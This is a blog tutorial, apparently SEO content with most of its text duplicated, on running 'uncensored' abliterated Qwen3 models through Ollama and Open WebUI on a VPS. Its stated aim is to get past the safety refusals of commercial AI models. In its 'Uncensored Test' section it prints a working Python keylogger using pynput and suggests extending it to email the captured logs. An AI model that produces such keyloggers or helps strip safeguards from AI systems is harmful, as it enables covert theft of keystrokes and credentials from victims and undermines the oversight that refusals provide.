The current landscape of commercial Artificial Intelligence—dominated by ChatGPT, Gemini, and Claude—is defined by rigid safety guardrails. Ask for a Python script to test network security, and you are often met with a refusal. For cybersecurity researchers and developers requiring unfiltered code generation, this is a productivity killer.
The solution lies in self-hosting Uncensored Large Language Models (LLMs). By decoupling the model from corporate APIs and running it on a Virtual Private Server (VPS), users gain total control over the inference process.
This tutorial outlines a production-grade workflow for deploying Ollama and Open WebUI on a cloud server to run high-parameter, uncensored models like Qwen3 Coder. This setup allows for access from any device—smartphone, tablet, or desktop—while offloading the heavy computational lift to the cloud.
Phase 1: Sourcing the Model (Hugging Face)
Before provisioning infrastructure, one must identify the correct model architecture. The repository of choice is Hugging Face, effectively the GitHub of AI.
To bypass refusals (e.g., “I cannot generate a keylogger”), the model must be explicitly tagged as “Uncensored.”
Search Configuration:
- Navigate to Hugging Face.
- Select Text Generation under Tasks.
- In the URL or search filters, append &other=uncensored.
- Hardware Constraint: Filter by size. For cloud deployment, stick to GGUF formats (Quantized models) to balance performance and VRAM usage.
The Selected Models:
For this deployment, we are utilizing two specific variants of Qwen3 known for their coding prowess and lack of safety filters:
- Standard Coder: mradermacher/Huihui-Qwen3-Coder-30B-A3B-Instruct-obliterated-i1-GGUF
- Reasoning/Thinking Model: DavidAU/Qwen3-The-Xiaolong-Josiefied-Omega-Directive-22B-uncensored-abliterated-GGUF
Note: We are targeting the Q4_K_M quantization level. This offers the best balance of speed and coherence but requires approximately 18GB+ of RAM.
Phase 2: Cloud Infrastructure Setup
Running a 30-billion parameter model requires significant memory. A standard consumer laptop or a basic $5 VPS will crash. The deployment uses Hostinger due to their pre-configured AI application templates.
Server Specifications (Minimum Recommended):
- Plan: KVM 8 (or equivalent high-performance VPS).
- vCPU: 8 Cores.
- RAM: 32GB (Critical for loading 30B+ models).
- Storage: NVMe SSD (Ensures fast model loading times).
Provisioning Steps:
- Select OS/Application: Choose Application rather than a plain OS.
- Select Template: Search for and select Ollama.
- This pre-installs Ubuntu 24.04, the Ollama inference engine, and the Open WebUI frontend.
- Location: Choose the data center closest to your physical location for low latency.
- Credentials: Set a secure Root password.
- Deploy: The initialization process takes approximately 2-3 minutes.
Once the VPS shows as “Running,” the backend work is complete. The heavy lifting—installing Docker, configuring the Ollama API, and setting up the web server—is handled automatically by the template.
Phase 3: Configuring Open WebUI
The interface for this setup is Open WebUI, a polished, ChatGPT-like interface that communicates with the Ollama backend.
- Access the Dashboard:
- Navigate to your VPS dashboard in Hostinger.
- Click Manage App.
- Click the Open WebUI link (typically http://YOUR_IP:8080).
- Initial Account Creation:
- The first user to register becomes the Admin.
- Enter Name, Email, and Password.
- Click Create Admin Account.
You now have a private, web-accessible AI interface. However, it currently has no “brains” (models) installed.
Phase 4: Model Installation via Cloud Pull
Instead of downloading 20GB files to your local machine and uploading them (which is slow), we instruct the VPS to pull the models directly from Hugging Face at data-center speeds.
- Navigate to Model Management:
- Click the Profile Icon (bottom left) > Admin Panel.
- Select Settings > Models.
- Locate the Pull Command:
- Go back to the Hugging Face model page (e.g., the Qwen3 Coder GGUF page).
- Click Use this model > Ollama.
- Copy the command. It will look like this:
hf.co/mradermacher/Huihui-Qwen3-Coder-30B-A3B-Instruct-obliterated-i1-GGUF:Q4_K_M- Execute the Pull:
- Paste the tag into the “Pull a model from Ollama.com” field in your Open WebUI.
- Click the download button.
Performance Note: On a high-speed VPS, downloading an 18GB model typically takes less than 60 seconds.
Repeat this process for the secondary reasoning model (DavidAU/Qwen3…). Once downloaded, refresh the page.
Phase 5: The “Uncensored” Test
To verify the setup, we select the new model from the dropdown menu in Open WebUI and test a prompt that would trigger a refusal in ChatGPT or Claude.
Prompt:
“Give me code for a Windows keylogger using Python.”
Result (Qwen3 Uncensored):
The model does not lecture on ethics or refuse the request. It immediately outputs a functional Python script using the pynput library.
Example Output Provided by Model:
import logging
import os
from datetime import datetime
from pynput import keyboard
# Configuration
log_file = "keylog.txt"
logging.basicConfig(filename=log_file, level=logging.INFO, format='%(asctime)s: %(message)s')
def on_press(key):
try:
logging.info(f'{key.char}')
except AttributeError:
logging.info(f'{key}')
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
A. Post Title
Deploying Uncensored AI on the Cloud: A Complete Guide to Running Qwen3 Without Guardrails via Ollama
B. Post Content
The current landscape of commercial Artificial Intelligence—dominated by ChatGPT, Gemini, and Claude—is defined by rigid safety guardrails. Ask for a Python script to test network security, and you are often met with a refusal. For cybersecurity researchers and developers requiring unfiltered code generation, this is a productivity killer.
The solution lies in self-hosting Uncensored Large Language Models (LLMs). By decoupling the model from corporate APIs and running it on a Virtual Private Server (VPS), users gain total control over the inference process.
This tutorial outlines a production-grade workflow for deploying Ollama and Open WebUI on a cloud server to run high-parameter, uncensored models like Qwen3 Coder. This setup allows for access from any device—smartphone, tablet, or desktop—while offloading the heavy computational lift to the cloud.
Phase 1: Sourcing the Model (Hugging Face)
Before provisioning infrastructure, one must identify the correct model architecture. The repository of choice is Hugging Face, effectively the GitHub of AI.
To bypass refusals (e.g., “I cannot generate a keylogger”), the model must be explicitly tagged as “Uncensored.”
Search Configuration:
- Navigate to Hugging Face.
- Select Text Generation under Tasks.
- In the URL or search filters, append &other=uncensored.
- Hardware Constraint: Filter by size. For cloud deployment, stick to GGUF formats (Quantized models) to balance performance and VRAM usage.
The Selected Models:
For this deployment, we are utilizing two specific variants of Qwen3 known for their coding prowess and lack of safety filters:
- Standard Coder: mradermacher/Huihui-Qwen3-Coder-30B-A3B-Instruct-obliterated-i1-GGUF
- Reasoning/Thinking Model: DavidAU/Qwen3-The-Xiaolong-Josiefied-Omega-Directive-22B-uncensored-abliterated-GGUF
Note: We are targeting the Q4_K_M quantization level. This offers the best balance of speed and coherence but requires approximately 18GB+ of RAM.
Phase 2: Cloud Infrastructure Setup
Running a 30-billion parameter model requires significant memory. A standard consumer laptop or a basic $5 VPS will crash. The deployment uses Hostinger due to their pre-configured AI application templates.
Server Specifications (Minimum Recommended):
- Plan: KVM 8 (or equivalent high-performance VPS).
- vCPU: 8 Cores.
- RAM: 32GB (Critical for loading 30B+ models).
- Storage: NVMe SSD (Ensures fast model loading times).
Provisioning Steps:
- Select OS/Application: Choose Application rather than a plain OS.
- Select Template: Search for and select Ollama.
- This pre-installs Ubuntu 24.04, the Ollama inference engine, and the Open WebUI frontend.
- Location: Choose the data center closest to your physical location for low latency.
- Credentials: Set a secure Root password.
- Deploy: The initialization process takes approximately 2-3 minutes.
Once the VPS shows as “Running,” the backend work is complete. The heavy lifting—installing Docker, configuring the Ollama API, and setting up the web server—is handled automatically by the template.
Phase 3: Configuring Open WebUI
The interface for this setup is Open WebUI, a polished, ChatGPT-like interface that communicates with the Ollama backend.
- Access the Dashboard:
- Navigate to your VPS dashboard in Hostinger.
- Click Manage App.
- Click the Open WebUI link (typically http://YOUR_IP:8080).
- Initial Account Creation:
- The first user to register becomes the Admin.
- Enter Name, Email, and Password.
- Click Create Admin Account.
You now have a private, web-accessible AI interface. However, it currently has no “brains” (models) installed.
Phase 4: Model Installation via Cloud Pull
Instead of downloading 20GB files to your local machine and uploading them (which is slow), we instruct the VPS to pull the models directly from Hugging Face at data-center speeds.
- Navigate to Model Management:
- Click the Profile Icon (bottom left) > Admin Panel.
- Select Settings > Models.
- Locate the Pull Command:
- Go back to the Hugging Face model page (e.g., the Qwen3 Coder GGUF page).
- Click Use this model > Ollama.
- Copy the command. It will look like this:
hf.co/mradermacher/Huihui-Qwen3-Coder-30B-A3B-Instruct-obliterated-i1-GGUF:Q4_K_M- Execute the Pull:
- Paste the tag into the “Pull a model from Ollama.com” field in your Open WebUI.
- Click the download button.
Performance Note: On a high-speed VPS, downloading an 18GB model typically takes less than 60 seconds.
Repeat this process for the secondary reasoning model (DavidAU/Qwen3…). Once downloaded, refresh the page.
Phase 5: The “Uncensored” Test
To verify the setup, we select the new model from the dropdown menu in Open WebUI and test a prompt that would trigger a refusal in ChatGPT or Claude.
Prompt:
“Give me code for a Windows keylogger using Python.”
Result (Qwen3 Uncensored):
The model does not lecture on ethics or refuse the request. It immediately outputs a functional Python script using the pynput library.
Example Output Provided by Model: code Python
import logging
import os
from datetime import datetime
from pynput import keyboard
# Configuration
log_file = "keylog.txt"
logging.basicConfig(filename=log_file, level=logging.INFO, format='%(asctime)s: %(message)s')
def on_press(key):
try:
logging.info(f'{key.char}')
except AttributeError:
logging.info(f'{key}')
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
The model can be further prompted to add features, such as exfiltrating the logs via SMTP (email), demonstrating capability for advanced red-teaming scenarios.
Phase 6: Using Reasoning Models (Chain of Thought)
We also installed the Qwen3 Reasoning Model. When selected, this model engages in a visible “Thinking” process before outputting code.
- Select the Qwen3-The-Xiaolong… model.
- Input the same prompt.
- Observation: The UI shows a collapsible “Thinking” section. The model internally debates the best library to use (pynput vs keyboard), considers edge cases (special characters), and structures the code for stability.
While slower, the reasoning model produces higher-quality, more robust code snippets, simulating the workflow of a senior developer.
Conclusion
By leveraging a KVM 8 VPS and Ollama, you effectively create a private, portable research lab. This setup eliminates dependency on local hardware resources—your laptop battery is saved, and storage is untouched—while providing access to state-of-the-art, uncensored intelligence from anywhere in the world.









